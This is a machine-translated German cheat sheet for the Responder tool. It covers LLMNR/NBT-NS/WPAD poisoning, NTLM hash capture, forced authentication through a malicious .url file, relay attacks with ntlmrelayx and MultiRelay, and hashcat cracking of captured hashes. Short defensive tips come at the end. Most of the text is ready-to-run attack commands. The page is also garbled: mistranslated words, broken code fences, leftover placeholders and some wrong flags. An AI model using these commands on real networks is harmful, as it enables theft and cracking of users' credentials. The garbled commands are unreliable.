Responder Cheat Sheet

📋 Kopieren Sie alle Befehle PDF generieren

Überblick

Responder ist ein leistungsstarker LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) und MDNS (Multicast DNS) Gifter. Es ist konzipiert, um auf bestimmte Netzwerknamen-Auflösungsabfragen zu reagieren und beinhaltet integrierte HTTP/SMB/MSSQL/FTP/LDAP Rogue-Authentifizierungsserver, die die NTLMv1/NTLMv2/LMv2 Authentifizierung unterstützen.

ZEIT Warning: Responder ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

Installation

Das ist der Grund.

# Update package list
sudo apt update

# Install if not already installed
sudo apt install responder
```_

### Von GitHub
```bash
# Clone the repository
git clone https://github.com/lgandx/Responder

# Navigate to the directory
cd Responder

# Make the Python script executable
chmod +x Responder.py
```_

### Verwendung von pip
```bash
# Install using pip
pip install Responder
```_

## Basisnutzung

### Erste Antwort
```bash
# Basic usage with interface specification
responder -I eth0

# Start with all options enabled
responder -I eth0 -wrf

# Analyze mode (passive)
responder -I eth0 -A
```_

## Kommandozeilenoptionen

|  | Option | Description |  |
| --- | --- |
|  | `-h, --help` | Show help message and exit |  |
|  | `-A, --analyze` | Analyze mode. Do not poison any requests, just analyze traffic |  |
|  | `-I <interface>` | Network interface to use |  |
|  | `-i <IP>` | IP address to bind to |  |
|  | `-e <IP>` | External IP address (for DHCP options) |  |
|  | `-b, --basic` | Return a Basic HTTP authentication. Default: NTLM |  |
|  | `-r, --wredir` | Enable answers for netbios wredir suffix queries |  |
|  | `-d, --NBTNSdomain` | Enable answers for netbios domain suffix queries |  |
|  | `-f, --fingerprint` | Fingerprint hosts that issued an NBT-NS or LLMNR query |  |
|  | `-w, --wpad` | Start the WPAD rogue proxy server |  |
|  | `-u, --upstream-proxy` | Upstream HTTP proxy used by the rogue WPAD proxy |  |
|  | `-F, --ForceWpadAuth` | Force NTLM/Basic authentication on wpad.dat file retrieval |  |
|  | `-P, --ProxyAuth` | Force NTLM/Basic authentication for any proxy request |  |
|  | `-lm, --LM` | Force LM hashing downgrade for Windows XP/2003 and earlier |  |
|  | `-v, --verbose` | Increase verbosity |  |
|  | `--log-local` | Log to file in addition to console |  |
|  | `-s, --disable-syslog` | Do not log to syslog |  |
|  | `-S, --disable-stdout` | Do not log to stdout |  |
|  | `-c, --config` | Path to configuration file |  |
|  | `--server=SERVER` | Enable/disable specific server (HTTP, SMB, etc.) |  |
|  | `--sql` | Enable the MSSQL server |  |
|  | `--mssql` | Enable the MSSQL server |  |
|  | `--https` | Enable the HTTPS server |  |
|  | `--http` | Enable the HTTP server |  |
|  | `--smb` | Enable the SMB server |  |
|  | `--ftp` | Enable the FTP server |  |
|  | `--imap` | Enable the IMAP server |  |
|  | `--pop` | Enable the POP server |  |
|  | `--smtp` | Enable the SMTP server |  |
|  | `--ldap` | Enable the LDAP server |  |
|  | `--dns` | Enable the DNS server |  |

## Datei konfigurieren

Die Konfigurationsdatei befindet sich bei __CODE_BLOCK_52_ oder im Responder-Verzeichnis als `Responder.conf`_.

### Schlüsselkonfigurationsoptionen
```ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
```_

## Angriffszenarien

### LLMNR/NBT-NS-Vergiftung
```bash
# Start Responder with default settings
responder -I eth0 -v

# Wait for authentication attempts
# Hashes will be saved in the logs directory
```_

### Zwangsauthentifizierung über UNC Pfad
```bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url

# Start Responder
responder -I eth0 -v

# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
```_

### WPAD Angriff
```bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v

# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
```_

### Relay Angriff Setup
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
```_

## Hash Capture und Cracking

### Blick auf gefangene Hashes
```bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
```_

### Cracking mit Hashcat
```bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist

# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
```_

## Erweiterte Techniken

### Mit Responder mit MultiRelay
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
```_

### Vergiftung bestimmter Hosts
```bash
# Create a file with target IPs
echo "192.168.1.10" > targets.txt

# Start Responder with target file
responder -I eth0 -v -e targets.txt
```_

### Individuelle Herausforderung
```bash
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
```_

## Defensive Maßnahmen

### LLMNR über Gruppenrichtlinie deaktivieren
1. Open Group Policy Editor
2. Navigieren Sie zu Computerkonfiguration > Verwaltungsvorlagen > Netzwerk > DNS Auftraggeber
3. Enable "Turn off Multicast Name Auflösung"

### NBT-NS über Kommandozeile deaktivieren
```bash
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
```_

### Deaktivieren von NBT-NS über Registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node) ```_

Erkennen von Responder-Aktivität

```bash

Monitor for suspicious LLMNR/NBT-NS responses

Look for multiple services running on the same IP

Check for unusual authentication attempts

```_

Fehlerbehebung

Gemeinsame Themen

1. Port Konflikte ```bash # Check if ports are already in use | netstat -tuln | grep -E '445 | 80 | 53' |

# Kill conflicting processes sudo kill

```_

1. *Interface nicht gefunden ```bash # List available interfaces ip a

# Use the correct interface name responder -I

```_

1. *Auftragsfragen ```bash # Run with sudo sudo responder -I eth0

```_

1. ** Keine Hashes gefangen* ```bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths

```_

Ressourcen

• Official GitHub Repository
• [MITRE ATT&CK; - LLMNR/NBT-NS Poisoning](LINK_3 -%20Kali%20Linux%20Tools%20-%20Responder

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Responder in Sicherheitstestszenarien. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *